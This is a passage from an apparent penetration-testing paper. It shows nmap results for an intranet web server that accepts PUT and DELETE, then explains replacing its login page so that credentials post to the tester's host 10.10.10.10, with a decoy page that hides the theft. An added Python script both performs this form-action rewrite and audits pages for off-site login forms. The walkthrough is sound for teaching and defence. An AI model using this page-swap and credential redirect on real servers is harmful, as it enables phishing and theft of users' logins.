| http-methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
| Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| See http://nmap.org/nsedoc/scripts/http-methods.html
| OPTIONS / -> HTTP/1.1 200 OK
| TRACE / -> HTTP/1.1 501 Not Implemented
| GET / -> HTTP/1.1 200 OK
| HEAD / -> HTTP/1.1 200 OK
| DELETE / -> HTTP/1.1 207 Multi-Status
| COPY / -> HTTP/1.1 400 Bad Request
| MOVE / -> HTTP/1.1 400 Bad Request
| PROPFIND / -> HTTP/1.1 411 Length Required
| PROPPATCH / -> HTTP/1.1 400 Bad Request
| SEARCH / -> HTTP/1.1 411 Length Required
| MKCOL / -> HTTP/1.1 405 Method Not Allowed
| UNLOCK / -> HTTP/1.1 400 Bad Request
| PUT / -> HTTP/1.1 411 Length Required
|_POST / -> HTTP/1.1 405 Method Not Allowed

Nmap scan report for 192.168.65.77
Host is up (0.0037s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
8080/tcp open  http-proxy
|_http-methods: No Allow or Public header in OPTIONS response

Nmap done: 256 IP addresses (2 hosts up) scanned in 52.94 seconds

Figure 16: NMAP scan result of the 192.168.65.0/24 network.


The penetration tester finds out that host 192.168.65.10 is being used as the company's intranet web server, as shown in Figure 17.

Figure 17: Screenshot of the HTTP Methods, Inc. intranet web server.

The penetration tester also finds out that host 192.168.65.10 accepts the PUT and DELETE methods. Instead of compromising the web server itself, the penetration tester decides to obtain user credentials through a phishing attack. He plans to delete the original page and replace it with a modified one that gives the penetration tester a copy of the user credentials.

5.3. Exploitation

The penetration tester needs to take several steps in order to perform the phishing attack. First, the penetration tester needs to download the source of the original login page, index.htm, and find out which parameters represent the username and password. Then, the penetration tester must modify the original login page so that it sends the login credentials to the penetration tester's server. As shown in Figure 18, in the original code a username and a password are sent to the "login.php" script on the web server, 192.168.65.10; in the modified code, however, the username and password are sent to the login.php script on the penetration tester's web server, 10.10.10.10.


Original Code: index.htm
[form markup not preserved; field labels: "Enter the username", "Enter the password"]

Modified Code: index.htm
[form markup not preserved; field labels: "Enter the username", "Enter the password"]

Figure 18: Modification of the index.htm file.

The penetration tester subsequently creates a new login.php file on the penetration tester's server, 10.10.10.10, which will store the login credentials received from the user, as shown in Figure 19 (T0mmy, 2009). The penetration tester also creates a copy of the original index.htm file and names it index2.htm; this file will be used to process the normal login procedure. For example, when a user opens the modified index.htm file, his username and password will be sent to the modified version of the login.php script on the penetration tester's server, which will redirect the user back to the index2.htm file. At this point, the user may feel something is wrong because he is asked to log in again. However, the user may think that he just fat-fingered the credentials and try the login process again. This time the user will be able to log in successfully because index2.htm is being used instead of the modified index.htm file.
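The edit of Figure 18 is a change to one attribute: the form's action is repointed from login.php on 192.168.65.10 to login.php on 10.10.10.10. The script below is an added example written for this page, not the paper's code. It performs that rewrite and, more usefully for whoever owns the intranet server, audits a served page for login forms whose action host is not one of the site's own, which is the check that would have caught the swapped index.htm. Because the paper's form markup did not survive, the HTML is constructed for this example and the field names "username" and "password" are assumptions.

```python
"""Form-action rewrite of Figure 18 (section 5.3) and the defender's audit
for login forms that post credentials off-site.  Added example; the HTML and
the field names are constructed/assumed, not taken from the paper."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the original index.htm described in the text.
ORIGINAL_INDEX = """<html><body>
<form method="post" action="login.php">
Enter the username <input type="text" name="username">
Enter the password <input type="password" name="password">
<input type="submit" value="Login">
</form></body></html>"""

PAGE_URL = "http://192.168.65.10/index.htm"


class FormAudit(HTMLParser):
    """Collect (resolved action URL, has_password_field) for every <form>."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        tag = tag.lower()
        if tag == "form":
            # Relative actions resolve against the page URL, as a browser would.
            self._current = [urljoin(self.page_url, a.get("action", "")), False]
        elif tag == "input" and self._current is not None and a.get("type", "").lower() == "password":
            self._current[1] = True

    def handle_endtag(self, tag):
        if tag.lower() == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def audit_forms(html, page_url):
    parser = FormAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.forms


def offsite_login_forms(html, page_url, trusted_hosts):
    """Actions of password-carrying forms whose host is not in trusted_hosts."""
    return [action for action, has_pw in audit_forms(html, page_url)
            if has_pw and urlsplit(action).hostname not in trusted_hosts]


def rewrite_form_action(html, new_action):
    """The attacker's edit: repoint every form's action, leaving the rest untouched."""
    return re.sub(r'(<form\b[^>]*\baction=")[^"]*(")',
                  lambda m: m.group(1) + new_action + m.group(2), html, flags=re.IGNORECASE)


if __name__ == "__main__":
    modified = rewrite_form_action(ORIGINAL_INDEX, "http://10.10.10.10/login.php")
    print("original off-site login forms:", offsite_login_forms(ORIGINAL_INDEX, PAGE_URL, {"192.168.65.10"}))
    print("modified off-site login forms:", offsite_login_forms(modified, PAGE_URL, {"192.168.65.10"}))
```

Fetching the live page periodically and running `offsite_login_forms` over it, alongside a hash comparison against the deployed artifact, catches both the action swap shown here and a wholesale page replacement delivered over PUT.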


